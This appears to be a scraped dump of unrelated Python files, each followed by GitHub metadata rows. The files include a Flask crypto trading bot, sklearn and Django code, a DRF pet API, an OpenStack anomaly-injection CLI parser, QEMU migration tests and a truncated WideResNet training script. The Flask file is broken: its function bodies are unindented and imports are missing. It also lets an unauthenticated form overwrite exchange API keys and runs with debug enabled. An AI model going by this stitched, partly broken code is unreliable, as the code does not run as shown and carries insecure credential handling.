from flask import render_template, request, url_for, flash, redirect
from flask_bootstrap import Bootstrap5
from mexc_sdk import Spot
from agents import TradingAgent
from clients import MexcClient
def to_float(x):
    """Convert *x* to float, returning None when conversion is impossible.

    Used to validate free-form form fields; None signals invalid input.
    """
    try:
        return float(x)
    except (TypeError, ValueError):
        # Catch only conversion failures; the previous bare `except` would
        # also have swallowed unrelated errors (e.g. KeyboardInterrupt).
        return None
# Load API credentials and other settings from the local dotenv file.
load_dotenv('.env')

# Exchange client wired with the MEXC access/secret keys from the environment.
client = MexcClient(
    Spot(
        os.environ.get('a_k'),
        os.environ.get('s_k')
    )
)

app = Flask(__name__)
# NOTE(review): the exchange secret key doubles as the Flask session secret —
# consider a dedicated SECRET_KEY value.
app.secret_key = os.environ.get('s_k')
bootstrap = Bootstrap5(app)

# Active trading pairs: ticker -> {'summa': allocated USDT, 'agent': running TradingAgent}
coins = {}
@app.route("/", methods=('GET', 'POST'))
def index():
if request.method == 'POST':
# validate ticker
ticker = request.form['ticker']
summa = to_float(request.form['summa'])
mul_buy = to_float(request.form['mul_buy'])
mul_sell = to_float(request.form['mul_sell'])
if not ticker:
flash('Заполни название пары')
elif not client.is_valid_ticker(ticker):
flash('Данной пары нет на бирже')
#validate trading volume
elif not summa:
flash('Введите сумму торговли')
elif client.get_balance('USDT')['free'] - sum(c['summa'] for k, c in coins.items()) - summa < 0:
flash('Недостаточно средств')
#validate buy multiply coeff
elif not mul_buy:
flash('не задан коэффциент для цены покупки')
#validate buy multiply coeff
elif not mul_sell:
flash('не задан коэффциент для цены покупки')
else:
if ticker not in coins:
coins[ticker] = {
'summa': summa,
'agent': TradingAgent(client, ticker, summa, mul_buy, mul_sell)
}
coins[ticker]['agent'].start()
return render_template('index.html', coins=coins)
return render_template('index.html', coins=coins)
@app.route("/remove/<string:id>", methods = ['POST'])
def remove(id):
coins[id]['agent'].stop_event.set()
coins.pop(id)
return redirect(url_for('index'))
@app.route("/settings", methods=('GET', 'POST'))
def settings():
if request.method == 'POST':
dotenv.set_key('.env', "a_k", request.form['a_k'])
dotenv.set_key('.env', "s_k", request.form['s_k'])
return redirect(url_for('index'))
return render_template('settings.html')
def close_running_threads():
    """Ask every running trading agent to stop (registered as an atexit hook)."""
    print('Остановлено пользователем')
    for entry in coins.values():
        entry['agent'].stop_event.set()
if __name__ == '__main__':
    # Ensure agents are signalled to stop when the dev server process exits.
    atexit.register(close_running_threads)
    app.run(debug=True)
| ArtemNechaev/traderbot | app.py | app.py | py | 2,908 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "clients.MexcClient",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "mexc_sdk.Spot",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
... |
40328938266 | from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.multioutput import MultiOutputClassifier
from data.tokenizer import tokenize
from sklearn.preprocessing import OneHotEncoder
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
import os
import joblib
class SplitFeatures(BaseEstimator, TransformerMixin):
    """
    Select a column (or column range) from a 2-D feature array.

    With only ``start`` set, ``transform`` yields the 1-D column at that
    index; with a truthy ``end`` it yields a copied 2-D slice
    ``[:, start:end]``.
    """

    def __init__(self, start, end=None):
        self.start = start
        self.end = end

    def fit(self, x, y=None):
        # Stateless transformer: nothing to learn from the data.
        return self

    def transform(self, all_features):
        if not self.end:
            return all_features[:, self.start]
        return all_features[:, self.start:self.end].copy()
def get_model_pipeline(model_name: str):
    """
    Get the model pipeline and the search parameters for the model
    :param model_name: str
        Name of the model to use
    :return: tuple
        scikit-learn Pipeline of the model, parameters of the model
    :raises ValueError: if ``model_name`` is not a known model.
    """
    # BUG FIX: the branches compared strings with 'is' (identity), which is
    # an implementation detail of interning and unreliable; use '=='.
    if model_name == "random_forest":
        # Text branch (bag-of-words + TF-IDF) unioned with one-hot dummy features.
        pipeline = Pipeline([("feature", FeatureUnion([
            ("nlp", Pipeline([
                ("split", SplitFeatures(start=0)),
                ("vect", CountVectorizer(tokenizer=tokenize)),
                ("tfidf", TfidfTransformer())
            ])),
            ("dummy", Pipeline([
                ("split", SplitFeatures(start=1, end=2)),
                ("encoder", OneHotEncoder(sparse=True))
            ]))
        ])),
            ("clf", MultiOutputClassifier(RandomForestClassifier()))])
        parameters = {
            "feature__nlp__vect__ngram_range": [(1, 1), (1, 2)],
            "feature__nlp__vect__min_df": [3, 5, 10],
            "clf__estimator__n_estimators": [100],
            "clf__estimator__min_samples_split": [4, 6]
        }
        return pipeline, parameters
    elif model_name == "logistic_regression":
        pipeline = Pipeline([
            ("split", SplitFeatures(start=0)),
            ("vect", CountVectorizer(tokenizer=tokenize)),
            ("tfidf", TfidfTransformer()),
            ("clf", MultiOutputClassifier(LogisticRegression()))])
        parameters = {
            "vect__ngram_range": [(1, 1), (1, 2)],
            "vect__min_df": [3, 5, 10]
        }
        return pipeline, parameters
    else:
        # BUG FIX: the '{}' placeholder was never filled in.
        raise ValueError("The model {} is not known, please create a model".format(model_name))
def build_model(model_name: str, n_jobs=1, cv=5):
    """
    Choose a model from the model factory and create a grid search object.
    :param model_name: str
        model name for the model in the model factory.
    :param n_jobs: int
        number of jobs for multi processing.
    :param cv: int
        number of folds for cross validation.
    :return:
        grid search model object.
    """
    pipeline, param_grid = get_model_pipeline(model_name)
    return GridSearchCV(pipeline, param_grid=param_grid, n_jobs=n_jobs, cv=cv,
                        scoring="f1_macro")
def load_model(model_path: str, model_name: str):
    """
    Load the pickle file with a trained scikit-learn pipeline.
    :param model_path: directory holding the persisted model.
    :param model_name: file name of the persisted model.
    :return: the unpickled pipeline object.
    """
    # Guard clause: fail fast when the combined path is not an existing file.
    model_file = os.path.join(model_path, model_name)
    if not os.path.isfile(model_file):
        raise ValueError("The provided filepath is not correct.")
    return joblib.load(model_file)
{
"api_name": "sklearn.base.BaseEstimator",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "sklearn.base.TransformerMixin",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "sklearn.pipeline.Pipeline",
"line_number": 41,
"usage_type": "call"
},
{
... |
74207450663 | import argparse
import logging
from .system import system_parser
from .network import network_parser
from .stress import stress_parser
log_debug = logging.getLogger("debugLog")
def get_parser(parent=None):
    """Build the 'anomaly' argparse parser tree.

    When *parent* (a subparsers object) is given, 'anomaly' is attached to it
    and *parent* is returned; otherwise a standalone parser is created and
    returned.  Targets (container / node / network / deployment) each get the
    three anomaly-type subcommands (system / network / stress) whose options
    come from the shared imported parsers.
    """
    # connection with main parser
    if not parent:
        anomaly_inject = argparse.ArgumentParser(description='Anomaly Injection', prog='anomaly')
        anomaly_inject.add_argument("--debug", help="Run command in debug mode", dest="debug", action='store_true')
    else:
        anomaly_inject = parent.add_parser('anomaly', help='Anomaly Injection')

    # Anomaly commands shared by every target subparser (dest names use the
    # 'target_' prefix consumed later by unpack_targets()).
    anomaly_parser = argparse.ArgumentParser(add_help=False)
    anomaly_parser.add_argument('--host', help='Hostname or ip of target', metavar='[hostname]', dest="target_host")

    # Anomaly parsers: one subcommand per injection target.
    anomaly_subcommands = anomaly_inject.add_subparsers(dest="target")
    anomaly_container = anomaly_subcommands.add_parser('container', prog='container',
                                                       parents=[anomaly_parser],
                                                       usage=f"{anomaly_inject.prog} %(prog)s",
                                                       description="Container anomaly injector, "
                                                                   "must specify host and name or id")
    anomaly_node = anomaly_subcommands.add_parser('node', prog='node', usage=f"{anomaly_inject.prog} %(prog)s",
                                                  parents=[anomaly_parser],
                                                  description="Node anomaly injector, "
                                                              "must specify host and name or id")
    anomaly_network = anomaly_subcommands.add_parser('network', prog='network', usage=f"{anomaly_inject.prog} %(prog)s",
                                                     parents=[anomaly_parser],
                                                     description="Network anomaly injector, "
                                                                 "must specify host and interface ")
    anomaly_network.add_argument('--interface', help='Name of interface', type=str, metavar='[NAME]',
                                 dest="target_interface")
    anomaly_deployment = anomaly_subcommands.add_parser('deployment', prog='deployment',
                                                        usage=f"{anomaly_inject.prog} %(prog)s",
                                                        parents=[anomaly_parser],
                                                        description="Deployment anomaly injector, "
                                                                    "must specify host and name or id")

    # Container Anomaly: target addressed by name or id (exactly one required).
    a_c_group = anomaly_container.add_mutually_exclusive_group(required=True)
    a_c_group.add_argument('--name', '-n', help='Name of container', type=str, metavar='[name]', dest="target_name")
    a_c_group.add_argument('--id', help='Container ID', type=str, metavar='[id]', dest="target_id")
    cont_anomalies = anomaly_container.add_subparsers(dest="anomaly_type")
    cont_system = cont_anomalies.add_parser("system", parents=[system_parser])
    cont_net = cont_anomalies.add_parser("network", parents=[network_parser])
    cont_stress = cont_anomalies.add_parser("stress", parents=[stress_parser])

    # Node Anomaly
    node_anomalies = anomaly_node.add_subparsers(dest="anomaly_type")
    node_system = node_anomalies.add_parser("system", parents=[system_parser])
    node_net = node_anomalies.add_parser("network", parents=[network_parser])
    node_stress = node_anomalies.add_parser("stress", parents=[stress_parser], )

    # Deployment Anomaly
    dep_anomalies = anomaly_deployment.add_subparsers(dest="anomaly_type")
    dep_system = dep_anomalies.add_parser("system", parents=[system_parser])
    dep_stress = dep_anomalies.add_parser("stress", parents=[stress_parser])
    dep_net = dep_anomalies.add_parser("network", parents=[network_parser])

    # Network Anomaly
    net_anomalies = anomaly_network.add_subparsers(dest="anomaly_type")
    net_stress = net_anomalies.add_parser("stress", parents=[stress_parser])
    net_system = net_anomalies.add_parser("system", parents=[system_parser])
    net_net = net_anomalies.add_parser("network", parents=[network_parser])

    if parent:
        return parent
    else:
        return anomaly_inject
def parse_arguments(args):
    """Convert a parsed argparse Namespace into the injector's argument dict.

    Collects target_* and param* options into nested 'target' / 'params'
    dicts and resolves the anomaly name.
    """
    arg_dict = vars(args)
    result = unpack_targets(arg_dict)
    result.update(unpack_params(arg_dict))
    # Fall back to the anomaly type when no explicit name was supplied.
    result['name'] = arg_dict.get('anomaly_name', arg_dict['anomaly_type'])
    log_debug.debug("Unpacked arguments" + str(result))
    return result
def unpack_targets(args):
    """Collect every truthy 'target*' entry of *args* under a 'target' dict.

    Keys shaped like ``target_<x>`` are stored as ``<x>``; keys without an
    underscore keep their full name.  Falsy values are skipped.
    """
    collected = {}
    for key, value in args.items():
        if "target" not in key or not value:
            continue
        parts = key.split("_")
        short_key = parts[1] if len(parts) > 1 else key
        collected[short_key] = value
    return {"target": collected}
def unpack_params(args):
    """Collect every truthy 'param*' entry of *args* under a 'params' dict.

    Mirrors unpack_targets(): ``param_<x>`` keys are stored as ``<x>``,
    single-word keys keep their full name, falsy values are skipped.
    """
    collected = {}
    for key, value in args.items():
        if "param" not in key or not value:
            continue
        parts = key.split("_")
        collected[parts[1] if len(parts) > 1 else key] = value
    return {"params": collected}
| Ydjeen/openstack_anomaly_injection | openstack_anomaly_injection/anomaly_injection/config/argparser/argparser.py | argparser.py | py | 5,377 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "syst... |
5840512827 | from django.http import HttpResponse
from django.http import JsonResponse
from bs4 import BeautifulSoup
import requests
def index(request):
    """Scrape Delhi pollutant readings from air-quality.com and return them as JSON.

    Pairs each pollutant name element with its value element and responds
    with ``{"data": {name: value, ...}}``.
    """
    url = "https://air-quality.com/place/india/delhi/a32ed7fc?lang=en&standard=aqi_us"
    req = requests.get(url)
    soup = BeautifulSoup(req.content, 'html.parser')
    val = soup.find("div", {"class": "pollutants"})
    c_name = val.findAll("div", {"class": "name"})
    v_name = val.findAll("div", {"class": "value"})
    # Pair names with values positionally; zip stops at the shorter list,
    # which also guards against a ragged scrape (the old index loop would
    # have raised IndexError instead).
    result = {name.get_text(): value.get_text() for name, value in zip(c_name, v_name)}
    return JsonResponse({"data": result})
{
"api_name": "requests.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.http.JsonResponse",
"line_number": 19,
"usage_type": "call"
}
] |
41787908029 | #from django.shortcuts import render
# Create your views here.
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework import generics
from animals.models import Categories, Status, Tags, Animal, AnimalForm
from api.serializers import AnimalSerializer
from django.http import JsonResponse
# @api_view(['POST'])
# def api_post(request, *args, **kwargs):
# serializer = AnimalSerializer(data=request.data)
# if serializer.is_valid(raise_exception=True):
# instance = serializer.save() #in case of modification
# return Response(serializer.data)
# return Response({"invalid": "Invalid data"}, status=405)
class AnimalDetailAPIView(generics.RetrieveAPIView):
    """DRF generic view: GET a single Animal by primary key."""
    queryset = Animal.objects.all()
    serializer_class = AnimalSerializer


# Callable view object for URLconf registration.
api_pet_detailed_view = AnimalDetailAPIView.as_view()
@api_view(['GET', 'DELETE', 'POST'])
def api_pet_by_id(request, pk=None, *args, **kwargs):
    """Retrieve, delete, or update a single Animal addressed by primary key.

    Returns 405 when no pk is supplied and 404 when the pet does not exist.
    """
    method = request.method
    print(method)
    print(pk)
    if pk is None:
        return Response(status=405)
    animal = Animal.objects.filter(pk=pk)
    animal = animal.first()
    if method == 'GET':  # use pk
        if animal is not None:
            data = AnimalSerializer(animal, many=False).data
            print(data)
            return Response(data, status=200)
        return Response(status=404)
    if method == 'DELETE':  # use pk
        if animal is not None:
            # Serialize before deleting so the response can echo the record.
            data = AnimalSerializer(animal, many=False).data
            animal.delete()
            # BUG FIX: was `Respone(...)` — a NameError at runtime.
            return Response(data, status=200)
        return Response(status=404)
    if method == 'POST':  # x-www-form-urlencoded
        form = AnimalForm(request.POST)
        # BUG FIX: Django's Form.is_valid() takes no raise_exception argument
        # (that keyword belongs to DRF serializers) — calling it that way
        # raised TypeError.
        if form.is_valid():
            instance = form.save()  # in case of modification
            return Response(form.data)
        return Response(status=405)
    return
# @api_view(['GET'])
# def api_get(request, *args, **kwargs):
# serializer = AnimalSerializer(data=request.data)
# return Response(status=404)
@api_view(['GET'])
def api_find_by_status(request, *args, **kwargs):
    """List pets whose status matches any of the comma-separated ?status= values.

    Falls back to 'available' when no usable status is supplied.
    """
    params = request.query_params
    statuses = set(params["status"].split(','))
    # An empty query string splits into {''}; drop the blank entry so the
    # default below can kick in.
    statuses.discard('')
    # BUG FIX: the old code compared a set against [] (always False), so the
    # 'available' default could never apply.
    if not statuses:
        statuses = {'available'}
    # Exclude every known status the caller did not ask for.
    to_exclude = {'available', 'pending', 'sold'} - statuses
    result = Animal.objects.exclude(status__in=to_exclude)
    data = AnimalSerializer(result, many=True).data
    return Response(list(data))
@api_view(['POST'])
def api_upload_picture(request, *args, **kwargs):
    """Placeholder endpoint: picture upload is not implemented (always 405)."""
    return Response(status=405)
@api_view(['POST', 'PUT'])
def api_pet(request, *args, **kwargs):
    """Create (POST) or update (PUT) an Animal from the request body.

    PUT requires an 'id' field; a missing pet yields 404, a missing or
    invalid payload yields 405.
    """
    method = request.method
    if method == "POST":
        serializer = AnimalSerializer(data=request.data)
        # is_valid(raise_exception=True) raises on bad data, so the 405
        # branch below is only reached if that behavior changes.
        if serializer.is_valid(raise_exception=True):
            instance = serializer.save()  # in case of modification
            return Response(serializer.data)
        return Response({"invalid": "Invalid data"}, status=405)
    if method == "PUT":
        data = request.data
        pkey = data.get('id')
        if pkey is not None:
            # 404 when the pet to update does not exist.
            if not Animal.objects.filter(id=pkey):
                return Response({"Description" : "Pet not found"}, status=404)
            serializer = AnimalSerializer(data=request.data)
            if serializer.is_valid(raise_exception=True):
                instance = serializer.save()
                return Response(status=201)
    return Response(status=405)
{
"api_name": "rest_framework.generics.RetrieveAPIView",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.generics",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "animals.models.Animal.objects.all",
"line_number": 24,
"usage_type":... |
25304954617 | """
Author: Diego Pinheiro
github: https://github.com/diegompin
"""
from itertools import cycle
from maracatu.src.plotting.plot_base import PlotBase
# import pandas as pd
# from dataintensive.src import Joint
# from dataintensive.src import BinsDataFrame
# from dataintensive.src import Parameter
# from dataintensive.src import Correlation
class Curves(PlotBase):
    '''
    Curve plotter: draws one styled line per input DataFrame with 'X'/'Y' columns.
    '''

    def __init__(self):
        super().__init__()

    def get_par_plot(self):
        # No extra plot parameters beyond the PlotBase defaults.
        par_plot = super().get_par_plot()
        return par_plot

    def plot(self, data, par_plot=None, fig=None, ax=None, **kwargs):
        '''
        plot() -> fig, ax, par_plot

        :param data: DataFrame or list of DataFrames, each with 'X' and 'Y' columns.
        :param par_plot: plot-parameter dict (color, marker, legend, linewidth, ...).
        :param fig: existing figure to draw on, or None to let the base create one.
        :param ax: existing axes to draw on, or None.
        :param kwargs: forwarded to ax.plot for every curve.
        :return: (fig, ax, par_plot)
        '''
        fig, ax, par_plot = super().plot(data, par_plot, fig, ax)
        if not isinstance(data, list):
            data = [data]
        # Cycle colors/markers so any number of curves gets a style.
        par_color = self.get_par(par_plot, 'color', default=PlotBase.colors, transform=cycle)
        par_marker = self.get_par(par_plot, 'marker', default=PlotBase.markers, transform=cycle)
        par_legend = self.get_par(par_plot, 'legend', transform=cycle)
        for df in data:
            label = ''
            if par_legend:
                label = next(par_legend)
            par_linewidth = self.get_par(par_plot, 'linewidth', 2)
            par_linestyle = self.get_par(par_plot, 'linestyle', '-')
            par_alpha = self.get_par(par_plot, 'alpha', .8)
            ax.plot(df['X'], df['Y'],
                    linewidth=par_linewidth,
                    linestyle=par_linestyle,
                    alpha=par_alpha,
                    color=next(par_color),
                    marker=next(par_marker),
                    label=label,
                    **kwargs)
        self.configure_ax(ax, par_plot)
        self.configure_fig(fig, par_plot)
        return fig, ax, par_plot
#
#
# class CurvesDataFrame(Curves):
#
# def __init__(self):
# super().__init__()
#
# def get_par_plot(self):
# par_plot = super().get_par_plot()
# return par_plot
#
# def plot(self, df, par_plot=None, fig=None, ax=None, **kwargs):
# # fig, ax, par_plot = super().plot(pyx, par_plot, fig, ax)
# par_xvar = par_plot['xvar']
# par_yvar = par_plot['yvar']
# par_xbins = par_plot['xbins']
# par_ybins = par_plot['ybins']
#
# df_freq = Joint.get_hist2d(df, xvar=par_xvar, xbins=par_xbins, yvar=par_yvar, ybins=par_ybins)
# df_freq = df_freq['p']
#
# par_slices = self.get_par(par_plot, 'slices', par_ybins)
# par_xbins = par_plot['xbins']
#
# par_plot_base = {
# # 'legend': ['$t$ = %d' % s for s in par_slices],
# # 'legend.loc': 'upper left',
# # 'legend.fontsize': 16,
# # 'fig.figsize': (7,5),
# 'xticklabels.heatmap': False
#
# }
# par_plot.update(par_plot_base)
#
# dfs = []
# for s in par_slices:
# dfs.append(pd.DataFrame({'x': par_xbins, 'y': df_freq.loc[:, s]}))
#
# fig, ax, par_plot = super().plot(dfs, par_plot, fig, ax)
# return fig, ax, par_plot
#
#
# class CurvesResiduals(object):
#
# def __init__(self):
# super().__init__()
# self.plotter = CurvesDataFrame()
#
# def plot(self, df, par_plot=None, fig=None, ax=None, **kwargs):
# par_xvar = par_plot['xvar']
# par_yvar = par_plot['yvar']
#
# xbins, ybins = BinsDataFrame().get(df, par_plot)
# xbins_label, ybins_label = xbins, ybins
#
# df_ori = df
# df = df_ori
#
# par_residuals = Parameter.get_par(par_plot, 'residuals', False)
# if par_residuals:
# df = Correlation.get_df(df, x=par_xvar, y=par_yvar)
#
# xbins_label, ybins_label = BinsDataFrame().get(df_ori, par_plot)
#
# par_base = {
# 'xbins': xbins,
# 'ybins': ybins,
# 'xticklabels': xbins_label,
# # 'xticklabels.formatter': '%.2f',
# # 'xticklabels.maxnlocator': 4,
# 'yticklabels': ybins_label,
# # 'yticklabels.formatter': '%d',
# # 'yticklabels.maxnlocator': 4,
# }
#
# par_base.update(par_plot)
#
# fig, ax, par = self.plotter.plot(df, par_base)
#
# return fig, ax, par_base
| diegompin/maracatu | maracatu/src/plotting/curves.py | curves.py | py | 4,421 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase.colors",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "maracatu.src.plotting.plot_base.PlotBase",
"lin... |
43676904102 | import numpy as np
import cv2
from PIL import Image, ImageFilter
import training_vs2
weights = np.load('weights.npy')
biases = np.load('biases.npy')
def imageprepare(argv):
    """Load an image file and convert it to an MNIST-style 28x28 grayscale vector.

    The image is scaled so its longer side becomes 20 px, sharpened, and
    centered on a white 28x28 canvas.  Returns a flat list of 784 floats in
    [0, 1], where 0 is pure white and 1 is pure black.
    """
    im = Image.open(argv).convert('L')
    width = float(im.size[0])
    height = float(im.size[1])
    newImage = Image.new('L', (28, 28), (255))  # creates white canvas of 28x28 pixels

    if width > height:  # check which dimension is bigger
        # Width is bigger. Width becomes 20 pixels.
        nheight = int(round((20/width*height), 0))  # resize height according to ratio width
        if (nheight == 0):  # rare case but minimum is 1 pixel
            nheight = 1
        # resize and sharpen.  BUG FIX: Image.ANTIALIAS was removed in
        # Pillow 10; Image.LANCZOS is the long-standing equivalent alias.
        img = im.resize((20, nheight), Image.LANCZOS).filter(ImageFilter.SHARPEN)
        wtop = int(round(((28 - nheight)/2), 0))  # calculate vertical position
        newImage.paste(img, (4, wtop))  # paste resized image on white canvas
    else:
        # Height is bigger. Height becomes 20 pixels.
        nwidth = int(round((20/height*width), 0))  # resize width according to ratio height
        if (nwidth == 0):  # rare case but minimum is 1 pixel
            nwidth = 1
        # resize and sharpen (same ANTIALIAS -> LANCZOS fix as above)
        img = im.resize((nwidth, 20), Image.LANCZOS).filter(ImageFilter.SHARPEN)
        wleft = int(round(((28 - nwidth)/2), 0))  # calculate horizontal position
        newImage.paste(img, (wleft, 4))  # paste resized image on white canvas

    # newImage.save("sample.png")

    tv = list(newImage.getdata())  # get pixel values
    # normalize pixels to 0 and 1. 0 is pure white, 1 is pure black.
    tva = [(255-x)/255 for x in tv]
    return tva
def feedforward(a):
    """Propagate activation *a* through every layer of the loaded network.

    Uses the module-level ``weights`` and ``biases`` arrays; each layer is a
    sigmoid-activated affine transform.
    """
    activation = a
    for layer_bias, layer_weight in zip(biases, weights):
        activation = sigmoid(np.dot(layer_weight, activation) + layer_bias)
    return activation
def sigmoid(z):
    """Element-wise logistic function 1 / (1 + e^-z)."""
    return np.reciprocal(1.0 + np.exp(-z))
def test_project(img):
    """Classify the digit image at path *img* with the loaded network.

    Returns the index of the most probable class (argmax over the network's
    output activations).
    """
    image = imageprepare(img)
    img = np.reshape(image, (784,1))
    # 28x28 view used only by the commented-out debug display below.
    zzz = np.reshape(img, (28,28))
    #cv2.namedWindow('ahihihi', cv2.WINDOW_NORMAL)
    #cv2.imshow('ahihihi', zzz)
    #cv2.waitKey(1)
    m = feedforward(img)
    return np.argmax(m)
| tpvt99/detect-gomoku-using-neural-network | test.py | test.py | py | 2,093 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.load",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 12,... |
38285183708 | import mock
import pytest
from fc.qemu.exc import MigrationError
from fc.qemu.incoming import (
IncomingAPI,
IncomingServer,
authenticated,
parse_address,
)
def test_authentication_wrapper():
    """@authenticated passes the call through on a cookie match and raises otherwise."""
    @authenticated
    def test(cookie):
        return 1

    context = mock.Mock()
    context.cookie = "asdf"
    # Matching cookie: wrapped function executes normally.
    assert test(context, "asdf") == 1
    # Wrong cookie: the wrapper must reject with MigrationError.
    with pytest.raises(MigrationError):
        test(context, "foobar")
def test_parse_address_host():
    # Hostname form: "host:port" splits into (host, int port).
    assert ("host", 1234) == parse_address("host:1234")
def test_parse_address_ipv4():
    # Dotted-quad IPv4 form.
    assert ("10.1.2.3", 4567) == parse_address("10.1.2.3:4567")
def test_parse_address_ipv6():
    # Renamed from 'test_parse_address_ipv5' (typo): the bracketed address
    # under test is IPv6, using the "[addr]:port" host syntax.
    assert ("2001:db8:1::45", 1234) == parse_address("[2001:db8:1::45]:1234")
def test_incoming_api():
    """Every IncomingAPI method authenticates with the cookie and delegates to the server."""
    server = mock.Mock()
    # The API derives its cookie from the agent's ceph auth cookie.
    server.agent.ceph.auth_cookie.return_value = "asdf"
    api = IncomingAPI(server)
    assert api.cookie == "asdf"

    # Each call below passes the valid cookie and must forward exactly once
    # to the corresponding server method.
    api.ping("asdf")
    assert server.extend_cutoff_time.call_args_list == [
        mock.call(hard_timeout=60)
    ]
    api.acquire_migration_lock("asdf")
    assert server.acquire_migration_lock.call_args_list == [mock.call()]
    api.release_migration_lock("asdf")
    assert server.release_migration_lock.call_args_list == [mock.call()]
    api.acquire_ceph_locks("asdf")
    assert server.acquire_ceph_locks.call_args_list == [mock.call()]
    api.prepare_incoming("asdf", [], {})
    assert server.prepare_incoming.call_args_list == [mock.call([], {})]
    api.finish_incoming("asdf")
    assert server.finish_incoming.call_args_list == [mock.call()]
    api.rescue("asdf")
    assert server.rescue.call_args_list == [mock.call()]
    api.destroy("asdf")
    assert server.destroy.call_args_list == [mock.call()]
    api.cancel("asdf")
    assert server.cancel.call_args_list == [mock.call()]
def test_incoming_server():
    """extend_cutoff_time only ever moves the cutoff forward.

    Observed behavior: soft timeouts extend relative to the current cutoff
    but never shrink it; hard timeouts reset the cutoff relative to 'now'.
    """
    agent = mock.Mock()
    agent.migration_ctl_address = "localhost:9000"
    server = IncomingServer(agent)
    assert server.bind_address == ("localhost", 9000)

    # Freeze the clock at t=30 so the cutoff arithmetic is deterministic.
    server._now = server.timeout._now = mock.Mock(return_value=30)
    server.timeout.cutoff = 29
    server.extend_cutoff_time(soft_timeout=60)
    assert server.timeout.cutoff == 90
    # Smaller soft timeouts must not reduce an already-later cutoff.
    server.extend_cutoff_time(soft_timeout=30)
    assert server.timeout.cutoff == 90
    server.extend_cutoff_time(soft_timeout=40)
    assert server.timeout.cutoff == 90
    server.extend_cutoff_time(soft_timeout=120)
    assert server.timeout.cutoff == 150
    # Hard timeouts are relative to 'now' (t=30), even if that shortens it.
    server.extend_cutoff_time(hard_timeout=30)
    assert server.timeout.cutoff == 60
    server.extend_cutoff_time(hard_timeout=340)
    assert server.timeout.cutoff == 370
    server.extend_cutoff_time(soft_timeout=30)
    assert server.timeout.cutoff == 370
| flyingcircusio/fc.qemu | src/fc/qemu/tests/test_migration.py | test_migration.py | py | 2,712 | python | en | code | 4 | github-code | 36 | [
{
"api_name": "fc.qemu.incoming.authenticated",
"line_number": 14,
"usage_type": "name"
},
{
"api_name": "mock.Mock",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "fc.qemu.exc.Mi... |
17436736893 | import argparse
import torch
from tqdm import tqdm
import matplotlib.pyplot as plt
import os
from torchvision import transforms
import dataset
from torch.utils.data import DataLoader
from utils.metric import get_overall_valid_score
from utils.generate_CAM import generate_validation_cam
from utils.pyutils import crop_validation_images
from utils.torchutils import PolyOptimizer
import yaml
import importlib
if __name__ == '__main__':
    # ---- CLI arguments ----------------------------------------------------
    parser = argparse.ArgumentParser()
    parser.add_argument('-batch', default=20, type=int)
    parser.add_argument('-epoch', default=20, type=int)
    parser.add_argument('-lr', default=0.01, type=float)
    parser.add_argument('-test_every', default=5, type=int, help="how often to test a model while training")
    parser.add_argument('-d','--device', nargs='+', help='GPU id to use parallel', required=True, type=int)
    parser.add_argument('-m', type=str, required=True, help='the save model name')
    args = parser.parse_args()

    batch_size = args.batch
    epochs = args.epoch
    base_lr = args.lr
    test_every = args.test_every
    devices = args.device
    model_name = args.m

    # ---- configuration (normalization stats, crop size, CAM scales) -------
    with open('classification/configuration.yml') as f:
        config = yaml.safe_load(f)
    mean = config['mean']
    std = config['std']
    network_image_size = config['network_image_size']
    scales = config['scales']

    if not os.path.exists('./classification/weights'):
        os.mkdir('./classification/weights')
    if not os.path.exists('./classification/result'):
        os.mkdir('./classification/result')

    # Pre-crop multi-scale validation patches once; skipped when the folder
    # already exists from a previous run.
    validation_folder_name = 'classification/glas_valid'
    validation_dataset_path = 'classification/glas/2.validation/img'
    validation_mask_path = 'classification/glas/2.validation/mask'
    if not os.path.exists(validation_folder_name):
        os.mkdir(validation_folder_name)
        print('crop validation set images ...')
        crop_validation_images(validation_dataset_path, network_image_size, network_image_size, scales, validation_folder_name)
        print('cropping finishes!')

    # load model: WideResNet-38 initialized from ImageNet-pretrained weights.
    resnet38_path = "classification/weights/res38d.pth"
    net = getattr(importlib.import_module("network.wide_resnet"), 'wideResNet')()
    # net = network.wideResNet()
    net.load_state_dict(torch.load(resnet38_path), strict=False)
    net = torch.nn.DataParallel(net, device_ids=devices).cuda()

    # data augmentation
    train_transform = transforms.Compose([
        transforms.RandomResizedCrop(size=network_image_size, scale=(0.7, 1)),
        transforms.RandomHorizontalFlip(),
        transforms.RandomVerticalFlip(),
        transforms.Normalize(mean=mean, std=std)
    ])

    # load training dataset
    data_path_name = f'classification/glas/1.training/img'
    TrainDataset = dataset.OriginPatchesDataset(data_path_name=data_path_name, transform=train_transform)
    print("train Dataset", len(TrainDataset))
    TrainDatasampler = torch.utils.data.RandomSampler(TrainDataset)
